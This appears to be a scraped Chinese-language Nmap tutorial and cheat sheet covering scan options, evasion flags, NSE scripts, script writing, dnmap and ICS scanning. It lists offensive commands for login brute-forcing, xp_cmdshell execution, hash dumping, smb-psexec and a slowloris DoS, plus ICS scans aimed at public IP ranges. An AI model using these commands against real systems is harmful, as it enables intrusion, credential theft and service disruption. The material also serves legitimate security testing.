常用参数说明
代码语言:javascript复制-iL filename 从文件中读取待检测的目标,文件中的表示方法支持机名,ip,网段-iR hostnum 随机选取,进行扫描.如果-iR指定为0,则是无休止的扫描--exclude host1[, host2] 从扫描任务中需要排除的主机 --exculdefile exclude_file 排除文件中的IP,格式和-iL指定扫描文件的格式相同主机发现-sL 仅仅是显示,扫描的IP数目,不会进行任何扫描-sn ping扫描,即主机发现-Pn 不检测主机存活-PS/PA/PU/PY[portlist] TCP SYN Ping/TCP ACK Ping/UDP Ping发现-PE/PP/PM 使用ICMP echo, timestamp and netmask 请求包发现主机-PO[prococol list] 使用IP协议包探测对方主机是否开启 -n/-R 不对IP进行域名反向解析/为所有的IP都进行域名的反响解析扫描技巧-sS/sT/sA/sW/sM TCP SYN/TCP connect()/ACK/TCP窗口扫描/TCP Maimon扫描-sU UDP扫描-sN/sF/sX TCP Null,FIN,and Xmas扫描--scanflags 自定义TCP包中的flags-sI zombie host[:probeport] Idlescan-sY/sZ SCTP INIT/COOKIE-ECHO 扫描-sO 使用IP protocol 扫描确定目标机支持的协议类型-b “FTP relay host” 使用FTP bounce scan指定端口和扫描顺序-p 特定的端口 -p80,443 或者 -p1-65535-p U:PORT 扫描udp的某个端口, -p U:53-F 快速扫描模式,比默认的扫描端口还少-r 不随机扫描端口,默认是随机扫描的--top-ports "number" 扫描开放概率最高的number个端口,出现的概率需要参考nmap-services文件,ubuntu中该文件位于/usr/share/nmap.nmap默认扫前1000个--port-ratio "ratio" 扫描指定频率以上的端口服务版本识别-sV 开放版本探测,可以直接使用-A同时打开操作系统探测和版本探测--version-intensity "level" 设置版本扫描强度,强度水平说明了应该使用哪些探测报文。数值越高,服务越有可能被正确识别。默认是7--version-light 打开轻量级模式,为--version-intensity 2的别名--version-all 尝试所有探测,为--version-intensity 9的别名--version-trace 显示出详细的版本侦测过程信息脚本扫描-sC 根据端口识别的服务,调用默认脚本--script=”Lua scripts” 调用的脚本名--script-args=n1=v1,[n2=v2] 调用的脚本传递的参数--script-args-file=filename 使用文本传递参数--script-trace 显示所有发送和接收到的数据--script-updatedb 更新脚本的数据库--script-help=”Lua script” 显示指定脚本的帮助OS识别-O 启用操作系统检测,-A来同时启用操作系统检测和版本检测--osscan-limit 针对指定的目标进行操作系统检测(至少需确知该主机分别有一个open和closed的端口)--osscan-guess 推测操作系统检测结果,当Nmap无法确定所检测的操作系统时,会尽可能地提供最相近的匹配,Nmap默认进行这种匹配防火墙/IDS躲避和哄骗-f; --mtu value 指定使用分片、指定数据包的MTU.-D decoy1,decoy2,ME 使用诱饵隐蔽扫描-S IP-ADDRESS 源地址欺骗-e interface 使用指定的接口-g/ --source-port PROTNUM 使用指定源端口 --proxies url1,[url2],... 使用HTTP或者SOCKS4的代理 --data-length NUM 填充随机数据让数据包长度达到NUM--ip-options OPTIONS 使用指定的IP选项来发送数据包--ttl VALUE 设置IP time-to-live域--spoof-mac ADDR/PREFIX/VEBDOR MAC地址伪装--badsum 使用错误的checksum来发送数据包Nmap 输出-oN 将标准输出直接写入指定的文件-oX 输出xml文件-oS 将所有的输出都改为大写-oG 输出便于通过bash或者perl处理的格式,非xml-oA BASENAME 可将扫描结果以标准格式、XML格式和Grep格式一次性输出-v 提高输出信息的详细度-d level 设置debug级别,最高是9--reason 显示端口处于带确认状态的原因--open 只输出端口状态为open的端口--packet-trace 显示所有发送或者接收到的数据包--iflist 显示路由信息和接口,便于调试--log-errors 把日志等级为errors/warings的日志输出--append-output 追加到指定的文件--resume FILENAME 恢复已停止的扫描--stylesheet PATH/URL 设置XSL样式表,转换XML输出--webxml 从namp.org得到XML的样式--no-sytlesheet 忽略XML声明的XSL样式表其他nmap选项-6 开启IPv6-A OS识别,版本探测,脚本扫描和traceroute--datedir DIRNAME 说明用户Nmap数据文件位置--send-eth / --send-ip 使用原以太网帧发送/在原IP层发送--privileged 假定用户具有全部权限--unprovoleged 假定用户不具有全部权限,创建原始套接字需要root权限-V 打印版本信息-h 输出帮助12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485861234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586用例
代码语言:javascript复制扫描网段 (192.168.1.0/24)
nmap -sP 192.168.1.0/24 或者 nmap -sP 192.168.1.*11
SYN对全端口进行扫描
在aggressive(4)的时间模板下,同时对开放的端口进行端口识别,并查看相应的服务器版本。
代码语言:javascript复制nmap -sS -T4 -p1-65535 -sV 192.168.1.16911
在aggressive(4)的时间模板下,探测操作系统的类型和版本,并显示traceroute的结果。
代码语言:javascript复制nmap -sS -T4 -A 192.168.1.16911
nmap -sS -T4 -A -O 192.168.1.16911
代码语言:javascript复制文件中读取需要扫描的IP列表
nmap -iL ips.txt11
扫描的结果输出处理
将扫描的结果输出到屏幕,同时存储一份到output.txt。
代码语言:javascript复制nmap -sS -p1-65525 192.168.1.169 -oG output.txt11
代码语言:javascript复制扫描结果输出为html。
nmap -sS -p1-65525 192.168.1.169 --webxml -oX - | xsltproc --output file.html11代码语言:javascript复制在子网中发现开放netbios的IP
nmap -sV -v -p139,445 192.168.1.0/2411
代码语言:javascript复制扫描指定netbios的名称
nmap -sU --script nbstat.nse -p 137 target11代码语言:javascript复制扫描指定的目标,同时检测相关漏洞
nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 16911
nmap脚本使用
常用脚本说明
代码语言:javascript复制auth: 负责处理鉴权证书(绕开鉴权)的脚本broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务brute: 提供暴力破解方式,针对常见的应用如http/snmp等default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等dos: 用于进行拒绝服务攻击exploit: 利用已知的漏洞入侵系统external: 利用第三方的数据库或资源,例如进行whois解析fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽malware: 探测目标机是否感染了病毒、开启了后门等信息safe: 此类与intrusive相反,属于安全性脚本version: 负责增强服务与版本扫描(Version Detection)功能的脚本vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_0671234567891011121312345678910111213代码语言:javascript复制负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令
nmap --script=auth 192.168.1.*11
代码语言:javascript复制提供暴力破解的方式 可对数据库,smb,snmp等进行简单密码的暴力猜解
nmap --script=brute 192.168.1.16911
代码语言:javascript复制默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击
nmap --script=default 192.168.1.169 或者 nmap -sC 192.168.1.16911
代码语言:javascript复制检查是否存在常见漏洞
nmap --script=vuln 192.168.1.16911
代码语言:javascript复制在局域网内探查更多服务开启状况
nmap -n -p445 --script=broadcast 192.168.1.16911
代码语言:javascript复制利用第三方的数据库或资源,例如进行whois解析
nmap --script external 192.168.1.16911
代码语言:javascript复制vnc扫描
nmap --script=realvnc-auth-bypass 192.168.1.16911
代码语言:javascript复制获取vnc信息
nmap --script=vnc-info 192.168.1.16911
smb扫描
说明:SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445。
代码语言:javascript复制nmap --script=smb-brute.nse 192.168.1.16911
- smb字典破解
nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.1.16911- smb已知几个严重漏扫描
nmap --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.1.16911
- smb查看共享目录
nmap -p 445 --script smb-ls --script-args \\\'share=c$,path= est,smbuser=administrator,smbpass=fuckyou\\\' 192.168.1.16911
- smb查询主机一些敏感信息
nmap -p 445 -n –script=smb-psexec --script-args \\\'smbuser=administrator,smbpass=fuckyou\\\' 192.168.1.16911- smb查看会话
nmap -p 445 -n --script=smb-enum-sessions --script-args \\\'smbuser=administrator,smbpass=fuckyou\\\' 192.168.1.16911
- smb系统信息
nmap -p 445 -n --script=smb-os-discovery --script-args \\\'smbuser=administrator,smbpass=fuckyou\\\' 192.168.1.16911
代码语言:javascript复制猜解mssql用户名和密码
nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.1.16911代码语言:javascript复制xp_cmdshell 执行命令
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.1.16911代码语言:javascript复制dumphash值
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=sa 192.168.1.16911代码语言:javascript复制扫描root空口令
nmap -p3306 --script=mysql-empty-password 192.168.1.16911
代码语言:javascript复制列出所有MySQL用户
nmap -p3306 --script=mysql-users --script-args=mysqluser=root 192.168.1.16911
代码语言:javascript复制支持同一应用的所有脚本扫描
nmap --script=mysql-* 192.168.1.16911
代码语言:javascript复制Oracle sid扫描
nmap --script=oracle-sid-brute -p 1521-1560 192.168.1.511代码语言:javascript复制oracle弱口令破解
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.1.511代码语言:javascript复制其他一些比较好用的脚本
nmap --script=broadcast-netbios-master-browser 192.168.137.4 发现网关 nmap -p 873 --script rsync-brute --script-args \\\'rsync-brute.module=www\\\' 192.168.137.4 破解rsync nmap --script informix-brute -p 9088 192.168.137.4 informix数据库破解 nmap -p 5432 --script pgsql-brute 192.168.137.4 pgsql破解 nmap -sU --script snmp-brute 192.168.137.4 snmp破解 nmap -sV --script=telnet-brute 192.168.137.4 telnet破解 nmap --script=http-vuln-cve2010-0738 --script-args \\\'http-vuln-cve2010-0738.paths={/path1/,/path2/}\\\' jboss autopwn nmap --script=http-methods.nse 192.168.137.4 检查http方法 nmap --script http-slowloris --max-parallelism 400 192.168.137.4 dos攻击,对于处理能力较小的站点还挺好用的 \\\'half-HTTP\\\' connections nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.137.41234567891012345678910nmap脚本编写
需要使用Lua脚本语言编写。 基于传统的语言标准,我们写一个脚本,作用:遇到开放的HTTP端口,就返回”Hello World”。 代码如下:
代码语言:javascript复制-- The Head Section -- -- The Rule Section -- portrule = function(host, port) return port.protocol == "tcp" and port.number == 80 and port.state == "open" end -- The Action Section -- action = function(host, port) return "Hello world !" end 注意:以--起始的行表示注释。12345678910111234567891011NSE脚本主要由三部分组成:
The Head Section
该部分包含一些元数据,主要描述脚本的功能,作者,影响力,类别及其他。
The Rule Section
该部分定义脚本执行的必要条件。至少包含下面列表中的一个函数: portrule hostrule prerule postrule 此案例中,重点介绍portrule。portrule能够在执行操作前,检查host和port属性。portrule会利用nmap的API检查TCP80端口。
The Action Section
该部分定义脚本逻辑。此处案例中,检测到开放80端口,则打印“HelloWorld”。脚本的输出内容,会在nmap执行期间显示出来。
代码语言:javascript复制nmap -sS -p 22,80,443 --script ./http-vuln-check.nse 192.168.1.16911
详情参考:
https://nmap.org/book/nse/api.html
http://blog.csdn.net/nixawk/article/details/39701019
python-nmap使用
代码语言:javascript复制pip install python-nmap11文档: http://xael.org/pages/python-nmap-en.html
libnmap使用
文档: https://libnmap.readthedocs.org/en/latest/
实例参考: http://www.freebuf.com/tools/32092.html
nmap源码分析
结构如下:
代码语言:javascript复制Nmap/├─docs(Nmap相关文档,包括License、usage说明及XMLschema文件等)│ ├─licenses│ └─man-xlate├─libdnet-stripped(libdnet:简单的网络接口开源库)│ ├─config│ ├─include│ └─src├─liblinear(LIBLINEAR:负责大型线性分类的开源库)│ └─blas├─liblua(Lua脚本语言源码库)├─libnetutil(Nmap实现的基本的网络实用函数)├─libpcap(开源的抓包代码库libpcap)│ ├─bpf│ ├─ChmodBPF│ ├─lbl│ ├─missing│ ├─msdos│ ├─NMAP_MODIFICATIONS│ ├─packaging│ ├─pcap│ ├─SUNOS4│ ├─tests│ └─Win32├─libpcre(Perl兼容的正则表达式开源库libpcre)├─macosx(该目录负责支持苹果的操作系统MACOS X)│ └─nmap.pmdoc├─mswin32(该目录负责支持Windows操作系统)│ ├─lib│ ├─license-format│ ├─NET│ ├─NETINET│ ├─nsis│ ├─OpenSSL│ ├─pcap-include│ ├─RPC│ └─winpcap├─nbase(Nmap封装的基础使用程序库,包括string/path/random等)├─ncat(Ncat是Nmap项目组实现的新版的netcat:强大的网络工具)│ ├─certs│ ├─docs│ └─test├─ndiff(Ndiff是用于比较Nmap扫描结果的实用命令)│ ├─docs│ └─test-scans├─nmap-update(负责Nmap更新相关操作)├─nping(Nping是Nmap项目组实现的新版的Hping:网络探测与构建packet)│ └─docs├─nselib(Nmap使用Lua语言编写的常用的脚本库)│ └─data├─nsock(Nmap实现的并行的SocketEvent处理库)│ ├─include│ └─src├─scripts(Nmap提供常用的扫描检查的lua脚本)├─todo(介绍Nmap项目将来开发的具体任务)└─zenmap(Nmap的官方的图形界面程序,由python语言编写)├─install_scripts├─radialnet├─share├─test├─zenmapCore└─zenmapGUI12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061621234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162nmap6.0工程内总共包括1300多个文件。
C和C 文件有600多个,主要实现Nmap最核心的功能:主机发现、端口扫描、服务侦测、OS侦测及搭建脚本引擎框架;也包括其他开源项目如libpcap的源码。
Python文件有100多个,主要实现Zenmap图形界面,Zenmap会调用到Nmap基本命令,也实现一些新的功能:例如确定网络拓扑结构、Profile的管理(常用的命令保存为Profile)等。
Lua与NSE文件400多个,负责构建Nmap脚本引擎及提供常用的扫描脚本。其中NSE格式为Nmap定制的Lua文件,方便用户自行编写脚本进行功能扩展。
XML文件数十个,用于辅助描述Nmap的内容或Zenmap的测试等工作。
其他文件,其他辅助工具操作的文件。
执行流程:
nmap分布式版本- dnmap
代码语言:javascript复制dnmap_server的用法
dnmap_server -h新建一个nmap 命令文件command.txt提交作业给服务器机子:dnmap_server -f ./command.txt12341234
服务端启动之后,就开始等待客户端链接。
代码语言:javascript复制dnmap_client的用法
dnmap_client -h连接到服务器地址,端口号及客户端的命名dnmap_client -s 192.168.1.152 -a \\\'salve01\\\'默认情况下扫描结果都被存储在名为 "nmap_result/." 目录下。12341234
参考: http://www.mateslab.com.ar/dnmap-the-distributed-nmap.html
nmap工控分析
工控分析也利用搜索引擎:shodan/zoomeye;下面主要介绍nmap常用的脚本。
- Ethernet/IP 44818
nmap -p 44818 --script enip-enumerate.nse 85.132.179.*11- Modbus 502
nmap --script modicon-info.nse -Pn -p 502 -sV 91.83.43.*11- IEC 61870-5-101/104 2404
nmap -Pn -n -d --script iec-identify.nse --script-args=iec-identify -p 2404 80.34.253.*11- Siemens S7 102
nmap -p 102 --script s7-enumerate -sV 140.207.152.*nmap -d --script mms-identify.nse --script-args=\\\'mms-identify.timeout=500\\\' -p 102 IP1212- Tridium Niagara Fox 1911
nmap -p 1911 --script fox-info 99.55.238.*11
